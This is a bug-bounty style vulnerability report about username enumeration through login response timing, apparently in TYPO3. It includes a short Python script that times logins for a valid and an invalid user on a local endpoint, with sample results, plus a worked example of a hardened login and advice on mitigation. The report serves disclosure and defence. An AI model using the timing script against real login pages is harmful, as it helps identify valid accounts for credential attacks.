huntr report 7D519735-2877-4FAD-BD77-ACCDE3E290A7 (reporter: vautia)
History: Aug 25, 2022 - 9:58 p.m.

User Enumeration via Response Timing

2022-08-25 21:58:47
vautia
www.huntr.dev
8
Tags: login functionality, timing difference, valid user, invalid user, response time, security bug

EPSS: 0.001 (Low), Percentile: 30.8%

Description

There is a significant timing difference in the login functionality for valid and invalid usernames.

Proof of Concept

1. Attempt a login with a valid user and an invalid user and observe the difference in the response time.

Here is a small test script (alternatively we can see the response time in Burp Repeater):

import requests

# Target login endpoint and two otherwise identical form submissions:
# one for an account that exists, one for an account that does not.
url = "http://127.0.0.1/typo3/login"
valid_user = {"username": "admin", "userident": "pw", "login_status": "login"}
invalid_user = {"username": "doesnotexist", "userident": "pw", "login_status": "login"}

# Time three attempts per username; r.elapsed measures from sending the
# request until the response headers arrive.
for _ in range(3):
    r = requests.post(url, data=valid_user, timeout=10)
    print(r.elapsed.total_seconds())

print('---')

for _ in range(3):
    r = requests.post(url, data=invalid_user, timeout=10)
    print(r.elapsed.total_seconds())

Results:

$ python3 timing.py
0.800313
0.778877
0.77845
---
0.021644
0.020045
0.019803

We can see that there is a difference in response time of about 750ms. This of course depends on the hash function the password is hashed with. Note that the rate limit was disabled for this PoC.
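The timing gap comes from the login path only running the slow password hash when the username exists. The following is an added, self-contained illustration of that server-side logic and of the usual fix; it is not code from this report or from TYPO3. The user store, the PBKDF2 parameters (standing in for whatever password hash the real application uses), the dummy credential and the function names are all assumptions made for the example.

```python
import hashlib
import hmac
import os
import statistics
import time

# Constructed sample user store: {username: (salt, pbkdf2 hash)}.
# PBKDF2 stands in for the application's real slow password hash.
ITERATIONS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


_SALT = os.urandom(16)
USERS = {"admin": (_SALT, hash_password("correct horse", _SALT))}

# Dummy credential (assumption) used to spend the same hashing effort on
# unknown usernames as on known ones.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("placeholder-not-a-real-password", _DUMMY_SALT)


def vulnerable_login(username: str, password: str) -> bool:
    """Returns early for unknown users: the slow hash only runs when the
    username exists, so the response time reveals whether it does."""
    record = USERS.get(username)
    if record is None:
        return False
    salt, stored = record
    return hmac.compare_digest(hash_password(password, salt), stored)


def hardened_login(username: str, password: str) -> bool:
    """Runs the password hash on every attempt, against a dummy record when
    the user is unknown, so timing no longer depends on username validity."""
    record = USERS.get(username)
    if record is None:
        salt, stored, known = _DUMMY_SALT, _DUMMY_HASH, False
    else:
        (salt, stored), known = record, True
    matches = hmac.compare_digest(hash_password(password, salt), stored)
    return known and matches


def _median_seconds(fn, username: str, password: str, rounds: int) -> float:
    samples = []
    for _ in range(rounds):
        start = time.perf_counter()
        fn(username, password)
        samples.append(time.perf_counter() - start)
    return statistics.median(samples)


def timing_ratio(login_fn, rounds: int = 3) -> float:
    """Median response time for an unknown user divided by that for a known
    user. Near 0 means the username leaks; near 1 means timing is equalised."""
    valid = _median_seconds(login_fn, "admin", "pw", rounds)
    invalid = _median_seconds(login_fn, "doesnotexist", "pw", rounds)
    return invalid / valid


if __name__ == "__main__":
    print(f"vulnerable login, invalid/valid time ratio: {timing_ratio(vulnerable_login):.4f}")
    print(f"hardened login,   invalid/valid time ratio: {timing_ratio(hardened_login):.4f}")
```

Running the block prints a ratio close to zero for the early-return version and close to one for the hardened one. The dummy verification is the standard mitigation for this class of finding; a rate limit (disabled in the PoC above) slows an enumeration attempt but does not remove the signal, and a spike of failed logins for usernames that do not exist is the corresponding thing to alert on.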
